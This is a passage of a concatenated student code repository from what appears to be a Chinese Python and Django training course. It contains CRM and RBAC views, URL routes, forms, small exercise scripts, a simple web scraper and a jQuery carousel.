name='classes_del'), # 公户管理 url(r'^public/custom/list/', public.public_customer_list, name='public_customer_list'), url(r'^public/custom/add/', public.public_customer_add, name='public_customer_add'), url(r'^public/custom/edit/(\d+)', public.public_customer_edit, name='public_customer_edit'), url(r'^public/custom/del/(\d+)', public.public_customer_del, name='public_customer_del'), # 私户管理 url(r'^private/custom/list/', private.private_customer_list, name='private_customer_list'), url(r'^private/custom/add/', private.private_customer_add, name='private_customer_add'), url(r'^private/custom/edit/(\d+)', private.private_customer_edit, name='private_customer_edit'), # 跟进记录 url(r'^record/list/(\d+)/', record.record_list, name='record_list'), url(r'^record/add/(\d+)/', record.record_add, name='record_add'), # 菜单 url(r'^menu/list/', menu.menu_list, name='menu_list'), url(r'^menu/add/', menu.menu_add, name='menu_add'), url(r'^menu/edit/(\d+)/', menu.menu_edit, name='menu_edit'), url(r'^menu/del/(\d+)/', menu.menu_del, name='menu_del'), # 权限 url(r'^permission/list/', permission.permission_list, name='permission_list'), url(r'^permission/add/', permission.permission_add, name='permission_add'), url(r'^permission/edit/(\d+)/', permission.permission_edit, name='permission_edit'), url(r'^permission/del/(\d+)/', permission.permission_del, name='permission_del'), # 角色 url(r'^role/list/', role.role_list, name='role_list'), url(r'^role/add/', role.role_add, name='role_add'), url(r'^role/edit/(\d+)/', role.role_edit, name='role_edit'), url(r'^role/del/(\d+)/', role.role_del, name='role_del'), ] <file_sep>/day27/s21crm/crm/views/course.py from django.shortcuts import render, redirect from crm import models from crm.forms.course import CourseModelForm from django.urls import reverse def course_list(request): """ 部门列表 :param request: :return: """ queryset = models.Course.objects.all() return render(request, 'course_list.html', {'queryset': queryset}) def course_add(request): """ 部门添加 
:param request: :return: """ if request.method == "GET": form = CourseModelForm() return render(request, 'course_add.html', {'form': form}) form = CourseModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('course_list') else: return render(request, 'course_add.html', {'form': form}) def course_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Course.objects.filter(id=nid).first() if request.method == "GET": form = CourseModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'course_edit.html', {"form": form}) form = CourseModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('course_list') else: return render(request, 'course_edit.html', {"form": form}) def course_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Course.objects.filter(id=nid).delete() return redirect('course_list') <file_sep>/day2/作业1.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] new_list=[] b = 1 for v in goods: #去循环goods列表然后给加入id v['id'] = b b+=1 #print (goods) salry = input ("请输入你的金额:") while True: for i in goods: print ( str(i.get("id"))+"\t"+i.get("name") + "\t" + str(i.get("price"))) m = input ("请输入你要购买的商品序号:").strip() if not m.isdigit() or m == '': print ("您输入的不是数字,请重新输入:") continue num = input("请输入你想要购买的个数:").strip() if not num.isdigit(): print ("请输入数字:") continue for j in goods: ##把你上面购买的商品加入到一个新的列表里 if int(m) == j.get('id'): new_list.append((j.get('name'),j.get('price'),int(num))) for v in new_list: #去循环新的列表然后打印出数量和价格 c=v[1] * v[2] ##数量乘以金额 yue=int(salry) - int(c) #print (yue) if yue < 0: print ("你的余额不足:") else: print ("你一共花费{}元,还剩{}元".format(c,yue)) break <file_sep>/day27/s21crm/rbac/service/permission.py from django.conf import settings def init_permission(user,request): """ 用户初始化,将权限信息和菜单信息放入session中。 :param user: 当前登录的用户对象 :param request: 
请求相关的所有数据 :return: """ permission_menu_list = user.roles.filter(permissions__isnull=False).distinct().values( 'permissions__title', 'permissions__url', 'permissions__name', 'permissions__menu_id', # 菜单相关 'permissions__menu__title', 'permissions__menu__icon', 'permissions__parent_id', # 父权限相关 'permissions__parent__name' ) # 2.3 获取当前用户拥有的所有权限信息 + 获取当前用户拥有的所有权限信息 permission_dict = {} menu_dict = {} for item in permission_menu_list: # 添加权限字典中 name = item['permissions__name'] url = item['permissions__url'] menu_id = item['permissions__menu_id'] parent_name = item['permissions__parent__name'] permission_dict[name] = {'url': url, 'menu_id': menu_id, 'parent_name': parent_name} # 添加到菜单字典中(只要可以成为菜单的权限) if menu_id: menu_id = item['permissions__menu_id'] if menu_id in menu_dict: menu_dict[menu_id]['children'].append( {'title': item['permissions__title'], 'url': item['permissions__url'], 'name': item['permissions__name']}) else: menu_dict[menu_id] = { 'title': item['permissions__menu__title'], 'icon': item['permissions__menu__icon'], 'class': 'hide', 'children': [ {'title': item['permissions__title'], 'url': item['permissions__url'], 'name': item['permissions__name']} ] } request.session[settings.RBAC_PERMISSION_SESSION_KEY] = permission_dict request.session[settings.RBAC_MENU_SESSION_KEY] = menu_dict<file_sep>/day8/sockerserver/my_socker_server.py import time import socketserver class Myserver(socketserver.BaseRequestHandler): def handle(self): conn=self.request print(conn) time.sleep(1) conn.send(b'hello') time.sleep(1) conn.send(b'world') myserver=socketserver.ThreadingTCPServer(('127.0.0.1',9000),Myserver) myserver.serve_forever()<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/forms.py from django import forms from web import models class UserForm(forms.Form): name = forms.CharField( max_length=12, min_length=2, # 如果想让网页显示中文就加上label label="用户名", error_messages={'required': '请输入用户名'}, # 给tttle生成的input标签加上一个class类 widget=forms.widgets.TextInput(attrs={"class": "form-control"}) ) 
<file_sep>/day15/作业/core/register.py from conf import setting from core import loging import pymysql log=loging.mylog() # 注册函数 def register(): conn = pymysql.connect(host=(setting.host), user=(setting.user), password=(setting.password), database=(setting.database), charset=(setting.charset)) cursor = conn.cursor() count = 0 while count < 3: count += 1 user = input('用户名:').strip() pwd = input('密码:').strip() sql2 = "select * from t1 where user=%s" res2 = cursor.execute(sql2, [user]) # 执行sql语句,返回sql查询成功的记录数目 if res2: print('用户名已存在') log.warning('用户名已经存在') else: # 执行完毕返回的结果集默认以元组显示 sql = "insert into t1(user,pwd) values (%s,%s)" res = cursor.execute(sql, [user, pwd]) # 执行sql语句,返回sql查询成功的记录数目 if res: print('注册成功') log.info('注册成功') conn.commit() quit() else: print('注册失败') log.error("注册失败") continue cursor.close() conn.close() <file_sep>/复习/正则和re模块.py import re ret = re.findall('a','bac agon yuan') print(ret)<file_sep>/day19/form/app01/forms.py from django import forms from app01 import models from django.core.exceptions import ValidationError #注册功能 from django.core.validators import RegexValidator # 检验手机号码是否正确 # 自己定义一个form类 class BookForm(forms.Form): title=forms.CharField( max_length=12, min_length=2, # 如果想让网页显示中文就加上label label="书名", initial="填写书名", # 给tttle生成的input标签加上一个class类 widget=forms.widgets.TextInput(attrs={"class":"form-control"}) ) publisher_date=forms.DateField( label="出版日期", # widget 插件 widget=forms.widgets.DateInput(attrs={"type":"date","class":"form-control"}) ) phone=forms.CharField( max_length=11, validators=[RegexValidator(r'^1[356789]\d{9}$',"手机号码格式不正确")], # 限制手机号格式 widget = forms.widgets.TextInput(attrs={"class": "form-control"}) ) # 用modelchoicefield可以实时显示到页面上面当数据库增加的时候 publisher = forms.ModelChoiceField( queryset=models.Publisher.objects.all(), widget=forms.widgets.Select(attrs={"class": "form-control"}), ) authors=forms.ModelMultipleChoiceField( queryset=models.Author.objects.all(), widget=forms.widgets.SelectMultiple(attrs={"class": 
"form-control"}) ) #自定义一个局部钩子函数含有alex的关键字不能提交 def clean_title(self): value=self.cleaned_data.get("title") #获取书名 if "alex" in value: raise ValidationError("ALEX以备和谐") else: return value <file_sep>/deploy/web/views/account.py from django.shortcuts import render, HttpResponse, redirect from django.urls import reverse from web import models from web.utils.check_code import gen_check_code from io import BytesIO def login(request): """ 用户登录 :param request: :return: """ import random data = random.randint(1000, 9999) if request.method == 'GET': return render(request, 'login.html', {'data': data}) code = request.POST.get('code') # 获取网页上面显示的验证码 check_code = request.session.get('check_code') # 用户输入的验证码 if not code: return render(request, 'login.html', {'error': '请输入验证码'}) if code.upper() != check_code.upper(): return render(request, 'login.html', {'error': '验证码错误'}) user = request.POST.get('username') pwd = request.POST.get('<PASSWORD>') user_object = models.UserInfo.objects.filter(username=user, password=pwd).first() if not user_object: return render(request, 'login.html', {'error': '用户名或密码错误'}) request.session['user_id'] = user_object.id # 登录成功之后将用户信息保存到session里面 return redirect(reverse('project_list')) # 引用gen_check_code,生成验证码 def check_code(request): img, code = gen_check_code() obj = BytesIO() print(obj.getvalue()) img.save(obj, format='png') request.session['check_code'] = code # 将验证码保存到session里面 return HttpResponse(obj.getvalue()) <file_sep>/day22/teplate_about/app01/views.py from django.shortcuts import render # Create your views here. 
import datetime def index(request): now=datetime.datetime.now() print(now,type(now)) return render(request,"index.html",{"now":now})<file_sep>/day4/优秀的作业/优秀的作业/马珺浩/day04作业_马珺浩/员工信息数据库/员工信息数据库.py ''' 文件存储格式如下: id,name,age,phone,job 1,Alex,22,13651054608,IT 2,Egon,23,13304320533,Tearcher 3,nezha,25,1333235322,IT 现在需要对这个员工信息文件进行增删改查。 基础必做: a.可以进行查询,支持三种语法: select 列名1,列名2,… where 列名条件 支持:大于小于等于,还要支持模糊查找。 示例: select name, age where age>22 select * where job=IT select * where phone like 133 进阶选做: b.可创建新员工记录,id要顺序增加c.可删除指定员工记录,直接输入员工id即可 d.修改员工信息 语法:set 列名=“新的值” where 条件 #先用where查找对应人的信息,再使用set来修改列名对应的值为“新的值” 注意:要想操作员工信息表,必须先登录,登陆认证需要用装饰器完成 其他需求尽量用函数实现 ''' __author__ = '<NAME>' from prettytable import PrettyTable # 首先定义一个字典,记录当前用户登录状态 verify_status = {'name': None, 'status': None} pwd_dic = {} # 定义装饰器,操作前验证用户是否登录 # staff_pwd为密码本 def verify(func): def inner(*args, **kwargs): if verify_status['name'] and verify_status['status']: return func(*args, **kwargs) else: with open('staff_pwd', 'r', encoding='utf-8') as f_read: line = f_read.read().split('\n') for msg in line: pwd_dic[msg.split()[0]] = msg.split()[1] name = input('Please input your name:').strip() pwd = input('Please input your password:').strip() if name in pwd_dic: if pwd == pwd_dic[name]: verify_status['name'] = name verify_status['status'] = True return func(*args, **kwargs) else: pass return inner # 登录方式1 def login1(): cmd_inp_list = cmd_inp.split() if '-u' in cmd_inp_list and '-p' in cmd_inp_list and len(cmd_inp.split()) == 5: name_num = cmd_inp_list.index('-u') + 1 pwd_num = cmd_inp_list.index('-p') + 1 with open('staff_pwd', encoding='utf-8') as f_read: line = f_read.read().split('\n') for msg in line: pwd_dic[msg.split()[0]] = msg.split()[1] if cmd_inp_list[name_num] in pwd_dic: if cmd_inp_list[pwd_num] == pwd_dic[cmd_inp_list[name_num]]: verify_status['name'] = cmd_inp_list[name_num] verify_status['status'] = True print('Login successful!') else: print('Error input!') # 语法纠正:不论输入命令行结尾有没有‘;’,都在源码中先删掉,方便取值 
def grammar(sent): if sent.endswith(';'): sent = sent[:len(sent) - 1] else: sent = sent return sent # select语法函数 def select(func): inp_list = func.split() # 列名查找 if len(inp_list) == 4 and inp_list[2] == 'where': with open('员工信息.txt', encoding='utf-8') as f_read: # [id,name,age,phone,job] line_title = f_read.readline()[:-1].split(',') # 选择的元素为全局 if '*' in inp_list[1]: sel_table = PrettyTable(line_title) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: # 遍历所有列表,并列表形式切割 line_lis_all = line.split(',') # 筛选有用的元素,首先将判断语句摘出来 cond_sent = inp_list[3] if '>' in cond_sent: cond_lis = cond_sent.split('>') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] > cond_val: sel_table.add_row(line_lis_all) if '<' in cond_sent: cond_lis = cond_sent.split('<') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] < cond_val: sel_table.add_row(line_lis_all) if '=' in cond_sent: cond_lis = cond_sent.split('=') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if cond_val == line_lis_all[cond_ele_num]: sel_table.add_row(line_lis_all) print(sel_table) # 选择元素为多元素 # and后是为避免输错元素拼写而报错设置 if ',' in inp_list[1] and set(inp_list[1].split(',')) < set(line_title): # 筛选select后的元素列表 ele_lis = inp_list[1].split(',') sel_table = PrettyTable(ele_lis) # 将判断语句筛选出来 cond_sent = inp_list[3] num_lis = [] # 将select后的多元素的索引值,存入一个列表备用 for ele in ele_lis: num_lis.append(line_title.index(ele)) f_read.seek(31) # 标题后的所有数据,以每行列表的形式取出 msg_lis = f_read.read().split('\n') # 逐行判断,并把一行的值转换成一个列表line_lis_all for line in msg_lis: line_lis_all = line.split(',') # 所有类型都在 line_lis_need = [] if '>' in cond_sent: cond_lis = cond_sent.split('>') cond_ele = cond_lis[0] # 类型 cond_val = cond_lis[1] # 值 cond_ele_num = line_title.index(cond_ele) # 根据类型找出该值在line_lis_all的索引 if line_lis_all[cond_ele_num] > cond_val: # 判断,如果True: for num in num_lis: # 
开始索引取值,取值取的是select的多元素类型 line_lis_need.append(line_lis_all[num]) # 只筛选要的值 sel_table.add_row(line_lis_need) # 添加到表中 if '<' in cond_sent: cond_lis = cond_sent.split('<') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] < cond_val: for num in num_lis: line_lis_need.append(line_lis_all[num]) sel_table.add_row(line_lis_need) if '=' in cond_sent: cond_lis = cond_sent.split('=') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] == cond_val: for num in num_lis: line_lis_need.append(line_lis_all[num]) sel_table.add_row(line_lis_need) print(sel_table) # 选择元素为单一元素 else: if inp_list[1] in line_title: # ele_lis用作打印表格title ele_lis = [] ele_lis.append(inp_list[1]) # ele_lis_num用于索引表的元素 ele_lis_num = line_title.index(inp_list[1]) sel_table = PrettyTable(ele_lis) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: line_lis_all = line.split(',') line_lis_need = [] cond_sent = inp_list[3] if '>' in cond_sent: cond_lis = cond_sent.split('>') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] > cond_val: line_lis_need.append(line_lis_all[ele_lis_num]) sel_table.add_row(line_lis_need) if '<' in cond_sent: cond_lis = cond_sent.split('<') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] < cond_val: line_lis_need.append(line_lis_all[ele_lis_num]) sel_table.add_row(line_lis_need) if '=' in cond_sent: cond_lis = cond_sent.split('=') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] == cond_val: line_lis_need.append(line_lis_all[ele_lis_num]) sel_table.add_row(line_lis_need) print(sel_table) # 模糊查找 if len(inp_list) == 6 and inp_list[2] == 'where' and inp_list[4] == 'like': with open('员工信息.txt', 'r', encoding='utf-8') as f_read: # 
[id,name,age,phone,job] line_title = f_read.readline()[:-1].split(',') # 选择元素为全局 if '*' in inp_list[1]: sel_table = PrettyTable(line_title) if inp_list[3] in line_title: # 索引关键字位置 num_word = line_title.index(inp_list[3]) f_read.seek(31) msg_lis = f_read.read().split('\n') # 多行 for line in msg_lis: word_lis = line.split(',') # 对应值 if inp_list[5] in word_lis[num_word]: sel_table.add_row(word_lis) print(sel_table) # 选择元素为多元素 # and后是为避免输错元素拼写而报错设置 if ',' in inp_list[1] and set(inp_list[1].split(',')) < set(line_title): # 只打印选定的元素 ele_lis = inp_list[1].split(',') sel_table = PrettyTable(ele_lis) # 索引选定值的位置存入列表 ele_num_lis = [] for ele_word in ele_lis: ele_num_lis.append(line_title.index(ele_word)) if inp_list[3] in line_title: # 索引关键字位置 num_word = line_title.index(inp_list[3]) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: word_lis = line.split(',') word_print_lis = [] if inp_list[5] in word_lis[num_word]: # 按之前找好的选定元素找对应值 for ele_num in ele_num_lis: word_print_lis.append(word_lis[ele_num]) sel_table.add_row(word_print_lis) print(sel_table) # 选择元素为单一元素 else: if inp_list[1] in line_title: title_print = [] title_print.append(inp_list[1]) sel_table = PrettyTable(title_print) # 索引选定制的位置并记录 ele_num = line_title.index(inp_list[1]) if inp_list[3] in line_title: # 索引关键字位置 num_word = line_title.index(inp_list[3]) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: word_lis = line.split(',') word_print_lis = [] if inp_list[5] in word_lis[num_word]: word_print_lis.append(word_lis[ele_num]) sel_table.add_row(word_print_lis) print(sel_table) # insert语法函数,属于添加员工信息表,需验证登陆登陆状态 @verify def insert(func): inp_lis = func.split() with open('员工信息.txt', 'r', encoding='utf-8') as f_read: pass # 主程序开始 while True: login_flag = True while login_flag: cmd_inp = input('[root@foundation ~]# ').strip() if len(cmd_inp) != 0 and cmd_inp.split()[0] == 'mysql': # 以mysql -u [username] -p [password]的方式进入 if len(cmd_inp.split()) > 1: login1() if 
verify_status['status']: login_flag = False # 直接进入mysql,用户、登录状态空 if len(cmd_inp.split()) == 1: login_flag = False sql_flag = True while sql_flag: sql_cmd = input('>>>>:').strip() sql_cmd = grammar(sql_cmd) # 浏览整个数据库数据 if sql_cmd == 'show database': with open('员工信息.txt', encoding='utf-8') as f_read: table = PrettyTable(f_read.readline().split(',')) msg = f_read.read().split('\n') for line in msg: table.add_row(line.split(',')) print(table) if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'select': select(sql_cmd) if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'delete': pass if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'insert': insert(sql_cmd) if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'set': pass # 退出数据库时注销当前用户登录状态 if sql_cmd == 'exit': sql_flag = False login_flag = True verify_status['name'] = None verify_status['status'] = None <file_sep>/day25/爬取多个页面.py import requests import ssl # 需求:爬取搜狗知乎指定词条指定页码下的页面数据 headers = { # 对UA进行重写操作(伪装) 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } url = 'http://zhihu.sogou.com/zhihu?' 
word = input('enter a word:') start_page = int(input('enter a start page:')) end_page = int(input('enter a end page:')) for page in range(start_page, end_page + 1): param = { 'query': word, 'page': str(page) # 请求携带的参数必须为str } response = requests.get(url=url, params=param, headers=headers, proxies={"https": '192.168.127.12:8080'}) print(response.url) page_text = response.text file_name = word + str(page) + ".html" # 文件名字为word+数字 with open(file_name, 'w', encoding='utf-8') as fp: print('爬去到了第%d页的页面数据' % page) fp.write(page_text) <file_sep>/deploy/web/views/script.py from django.shortcuts import render,HttpResponse,redirect from web.forms.script import ScriptModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def script_list(request): """ 列表 :param request: :return: """ # 要查看的页码 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Script.objects.all().count() # 数据库中获取即可 pager = Pagination(page,total_count,request.path_info) depart_queryset = models.Script.objects.all()[pager.start :pager.end] return render(request,'script_list.html',{'depart_queryset':depart_queryset,'pager':pager}) def script_add(request): """ 添加 :param request: :return: """ if request.method == 'GET': form = ScriptModelForm() return render(request, 'form.html', {'form':form}) form = ScriptModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'script_list')) return render(request, 'form.html', {'form': form}) def script_edit(request,nid): """ 编辑 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Script.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = ScriptModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = ScriptModelForm(data=request.POST,instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request,'script_list')) return render(request, 
'form.html', {'form': form}) def script_del(request,nid): """ 删除 :param request: :param nid: :return: """ origin = memory_reverse(request,'script_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.Script.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/day2/编码.py #对于英文 s = 'laonanhai' print(s,type(s)) s1 = b'laonanhai' print(s1,type(s1)) #对于中文: s = '中国' print(s,type(s)) s1 = b'\xe4\xb8\xad\xe5\x9b\xbd' print(s1,type(s1))<file_sep>/day13/轮播/小米轮播图/3.js $(function () { // function yuandian() { // for (var i=0;i < $(".gradan .ui-pager-item").length;i++){ // if ($(".gradan.ui-pager-item").eq(i).css('background','white')); // $(".ui-pager-item a").eq(i+1).css('background','white').siblings().css('background','#666'); // $("img").eq(i).addClass("hide").siblings().removeClass("hide"); // // // } // // } // $('.gradan').click(function () { // clearInterval(down); // yuandian() // // }); function next() { // var img=document.getElementsByClassName('lunbo'); for (var i = 0; i < $(".there-right img").length; i++) { if ($(".there-right img").eq(i).hasClass("hide")) { if (i == 5) { i = -1 } $(".there-right img").eq(i + 1).addClass("hide").siblings().removeClass("hide"); $(".ui-pager-item a").eq(i+1).css('background','red').siblings().css('background','#666'); // $(".ui-pager-item a").eq(i+1).addClass("gradan ui-pager-item a").siblings().removeClass("gradan ui-pager-item a"); return } } } function prev() { for (var i = 5; i >= 0; i--) { if ($(".there-right img").eq(i).hasClass("hide")) { if (i == 0) { i = 6 } $(".there-right img").eq(i - 1).addClass("hide").siblings().removeClass("hide"); $(".ui-pager-item a").eq(i-1).css('background','white').siblings().css('background','#666'); return } } } var down = setInterval(next, 3000); $(".ui-next").click(function () { clearInterval(down); next(); }); $(".ui-prev").click(function () { clearInterval(down); prev(); }); });<file_sep>/day18/练习/练习/urls.py """练习 URL 
Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from app01 import views urlpatterns = [ # url(r'^admin/', admin.site.urls), # session 验证 url(r'^login/$', views.login), url(r'^index/$', views.index), url(r'^secode/$', views.secode), # 分页功能 url(r'^book_list/$', views.book_list), url(r'^publisher_list/$', views.publisher_list), # 中间件 url(r'^test/$', views.test), # orm多对多 url(r'^author_list/$',views.author_list), url(r'^add_author/$',views.Addauthor.as_view()), # 编辑 url(r'^edit_author/(\d+)/$',views.Editauthor.as_view()), # 删除 url(r'^del_author/(\d+)/$',views.del_author), # ajax url(r'^ajax_test/$',views.ajax_test), url(r'^calc/$',views.calc), # 注册 url(r'^reg/$',views.reg), url(r'^check_username/$',views.check_username), ] <file_sep>/day18/练习/app01/views.py from django.shortcuts import render, redirect, HttpResponse from functools import wraps from app01 import models import mypage from django import views # Create your views here. 
def login_check(func): @wraps(func) def inner(request, *args, **kwargs): next = request.path_info # 登录验证 # 取Session v = request.session.get("s21") if v == "hao": return func(request, *args, **kwargs) else: return redirect("/login/?next={}".format(next)) return inner # 登录 session验证 def login(request): if request.method == "POST": next = request.GET.get("next") username = request.POST.get("username") pwd = request.POST.get("pwd") if username == "alex" and pwd == "123": if next: rep = redirect(next) else: rep = redirect("/secode/") request.session["s21"] = "hao" request.session.set_expiry(70) return rep else: return HttpResponse("走吧") else: return render(request, "login.html") @login_check def index(request): return render(request, "index.html") @login_check def secode(request): return render(request, "secode.html") # 分页 def book_list(request): book = models.Book.objects.all() total_count = book.count() current_page = request.GET.get("page") # 分页功能开始 page_boj = mypage.MyPage(current_page, total_count, url_prefix="book_list") data = book[page_boj.start:page_boj.end] # 从第几页显示到第几页 page_html = page_boj.page_html() # 页面 page_num = page_boj.num() # 序号 return render(request, "book_list.html", {"book": data, "page_html": page_html, "num": page_num}) # # 查找所有书籍 # books = models.Book.objects.all() # # 拿到总数据量 # total_count = books.count() # # 每一页显示多少条数据 # per_page = 10 # # 页面最多显示多少页码 # max_show = 7 # # 最多显示页码数的一半 # half_show = max_show // 2 # 地板除,没有余数 # # 从url拿到page参数 # current_page = request.GET.get("page") # try: # current_page = int(current_page) # except Exception as e: # # 如果输入的页面有误默认显示第一页 # current_page = 1 # # 求总共需要多少页显示,总数据除以每页显示多少条 # total_page, more = divmod(total_count, per_page) # if more: # 代表有余数 # total_page += 1 # 需要在增加一个页码,才可以显示 # # 如果输入的当前页码大于总数据的页码 # if current_page > total_page: # current_page = total_page # # 计算一下,显示页码的起点和终点分别是多少 # show_page_start = current_page - half_show # show_page_end = current_page + half_show # # 当前页码 - half_show <=0 # if current_page 
- half_show <= 0: # show_page_start = 1 # show_page_end = max_show # # 当前页码数 + half_show >= total-page # if current_page + half_show >= total_page: # show_page_end = total_page # show_page_start = total_page - max_show # # 实际的总页码数 < max_show 比如我一共2页 # if total_page < max_show: # show_page_start = 1 # show_page_end = total_page # # # 数据切片的起点 # data_start = (current_page - 1) * per_page # # 数据切片的终点 # data_end = current_page * per_page # data = books[data_start:data_end] # # tmp = [] # page_html_start = '<nav aria-label="Page navigation" class="text-center"><ul class="pagination">' # page_html_end = '</ul></nav>' # tmp.append(page_html_start) # # 添加一个首页 # tmp.append('<li><a href="/book_list?page=1">首页</a></li>') # # # 添加一个上一页 # # 当当前页是第一页的时候不能再点击上一页 # if current_page - 1 <= 0: # tmp.append( # '<li class="disabled"><a href="#" aria-label="Previous"><span aria-hidden="true">&laquo;</span></a></li>') # else: # tmp.append( # '<li><a href="/book_list?page={}" aria-label="Previous"><span aria-hidden="true">&laquo;</span></a></li>'.format( # current_page - 1)) # # for循环添加要展示的页码 # for i in range(show_page_start, show_page_end + 1): # # 如果for循环的页码等于当前页码,给li标签加一个active的样式 # if current_page == i: # tmp.append('<li class="active"><a href="/book_list?page={0}">{0}</a></li>'.format(i)) # else: # tmp.append('<li><a href="/book_list?page={0}">{0}</a></li>'.format(i)) # # 添加一个下一页 # # 当前 当前页已经是最后一页,应该不让下一页按钮能点击 # if current_page + 1 > total_page: # tmp.append( # '<li class="disabled"><a href="#" aria-label="Previous"><span aria-hidden="true">&raquo;</span></a></li>') # else: # tmp.append( # '<li><a href="/book_list?page={}" aria-label="Previous"><span aria-hidden="true">&raquo;</span></a></li>'.format( # current_page + 1)) # # 添加一个尾页 # tmp.append('<li><a href="/book_list?page={}">尾页</a></li>'.format(total_page)) # tmp.append(page_html_end) # # page_html = "".join(tmp) # # # 序号 # xuhao=(current_page-1)*per_page # # return render(request, "book_list.html", {"books": data, "page_html": 
page_html,"num":xuhao}) # 分页 def publisher_list(request): publisher = models.Publisher.objects.all() total_count = publisher.count() # 总页面 current_page = request.GET.get("page") page_boj = mypage.MyPage(current_page, total_count, url_prefix="publisher_list") # 调用Mypage这个类,并传三个参数 data = publisher[page_boj.start:page_boj.end] # 从第几页显示到第几页 page_html = page_boj.page_html() # 页面 page_num = page_boj.num() # 序号 return render(request, "publisher_list.html", {"publisher": data, "page_html": page_html, "num": page_num}) # 中间件 def test(request): ''' views里面的视图函数 :param request: :return: ''' # print("这是test视图函数") # print(request.s21) # print(id(request)) return HttpResponse("o98k") # rep=HttpResponse("O98K") # def func(): # return HttpResponse('好好') # rep.render=func # return rep def author_list(request): data = models.Author.objects.all() return render(request, "author_list.html", {"author": data}) class Addauthor(views.View): def get(self, request): book_list = models.Book.objects.all() return render(request, "add_author.html", {"book_list": book_list}) def post(self, request): # 获取用户的新名字 auth_name = request.POST.get("name") # 获取用户添加的书,因为多选所有用getlist books_ids = request.POST.getlist("books") print(auth_name, books_ids) # 创建用户 author_obj = models.Author.objects.create(name=auth_name) # 去第三张关系表里建立记录 author_obj.books.set(books_ids) return redirect("/author_list/") class Editauthor(views.View): def get(self, request, edit_id): author_name = models.Author.objects.filter(id=edit_id).first() book_obj = models.Book.objects.all() return render(request, "edit_author.html", {"author_name": author_name, "book_list": book_obj}) def post(self, request, edit_id): author_obj = models.Author.objects.filter(id=edit_id).first() new_name = request.POST.get("name") # 获取选择的书 new_book = request.POST.getlist("books") author_obj.name = new_name author_obj.save() # 保存关联的书的id author_obj.books.set(new_book) return redirect("/author_list/") # 删除用户 def del_author(request, del_id): 
models.Author.objects.filter(id=del_id).delete() return redirect("/author_list/") # ajax def ajax_test(request): return render(request,".//ajax/ajax_test.html") #计算 def calc(request): i1=int(request.POST.get("i1")) i2=int(request.POST.get("i2")) ret=i1+i2 return HttpResponse(ret) def reg(request): return render(request,".//ajax/reg.html/") def check_username(request): username=request.POST.get("name") print(username) exsit_name=models.Userinfo.objects.filter(name=username) print(exsit_name) # obj=models.Userinfo.objects.first() # print(obj) if exsit_name: res="用户名已经存在" else: res="" return HttpResponse(res) <file_sep>/day27/s21crm/rbac/views/menu.py from django.shortcuts import render, redirect from rbac import models from rbac.forms.meau import MenuModelForm from django.urls import reverse def menu_list(request): """ 部门列表 :param request: :return: """ queryset = models.Menu.objects.all() return render(request, 'menu_list.html', {'queryset': queryset}) def menu_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = MenuModelForm() return render(request, 'menu_add.html', {'form': form}) form = MenuModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('menu_list') else: return render(request, 'menu_add.html', {'form': form}) def menu_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Menu.objects.filter(id=nid).first() if request.method == "GET": form = MenuModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'menu_edit.html', {"form": form}) form = MenuModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('menu_list') else: return render(request, 